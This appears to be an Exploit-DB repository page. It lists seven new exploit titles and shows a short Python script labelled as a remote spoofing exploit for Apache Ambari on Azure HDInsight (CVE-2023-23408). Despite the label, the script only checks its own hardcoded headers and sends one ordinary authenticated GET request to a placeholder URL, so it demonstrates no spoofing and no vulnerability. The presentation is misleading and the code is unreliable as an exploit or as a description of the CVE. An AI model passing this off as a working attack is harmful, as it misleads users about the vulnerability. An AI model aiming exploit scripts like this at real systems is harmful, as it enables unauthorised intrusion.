7807e6f266
7 changes to exploits/shellcodes/ghdb Azure Apache Ambari 2302250400 - Spoofing Microsoft SharePoint Enterprise Server 2016 - Spoofing Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection Xenforo Version 2.2.13 - Authenticated Stored XSS Windows 11 22h2 - Kernel Privilege Elevation
39 lines
No EOL
1.2 KiB
Python
Executable file
39 lines
No EOL
1.2 KiB
Python
Executable file
# Exploit Title: Azure Apache Ambari 2302250400 - Spoofing
|
|
# Date: 2023-06-23
|
|
# country: Iran
|
|
# Exploit Author: Amirhossein Bahramizadeh
|
|
# Category : Remote
|
|
# Vendor Homepage:
|
|
Microsoft
|
|
Apache Ambari
|
|
Microsoft azure Hdinsights
|
|
# Tested on: Windows/Linux
|
|
# CVE : CVE-2023-23408
|
|
|
|
import requests
|
|
|
|
# Set the URL and headers for the Ambari web interface
|
|
url = "https://ambari.example.com/api/v1/clusters/cluster_name/services"
|
|
headers = {"X-Requested-By": "ambari", "Authorization": "Basic abcdefghijklmnop"}
|
|
|
|
# Define a function to validate the headers
|
|
def validate_headers(headers):
|
|
if "X-Requested-By" not in headers or headers["X-Requested-By"] != "ambari":
|
|
return False
|
|
if "Authorization" not in headers or headers["Authorization"] != "Basic abcdefghijklmnop":
|
|
return False
|
|
return True
|
|
|
|
# Define a function to send a request to the Ambari web interface
|
|
def send_request(url, headers):
|
|
if not validate_headers(headers):
|
|
print("Invalid headers")
|
|
return
|
|
response = requests.get(url, headers=headers)
|
|
if response.status_code == 200:
|
|
print("Request successful")
|
|
else:
|
|
print("Request failed")
|
|
|
|
# Call the send_request function with the URL and headers
|
|
send_request(url, headers) |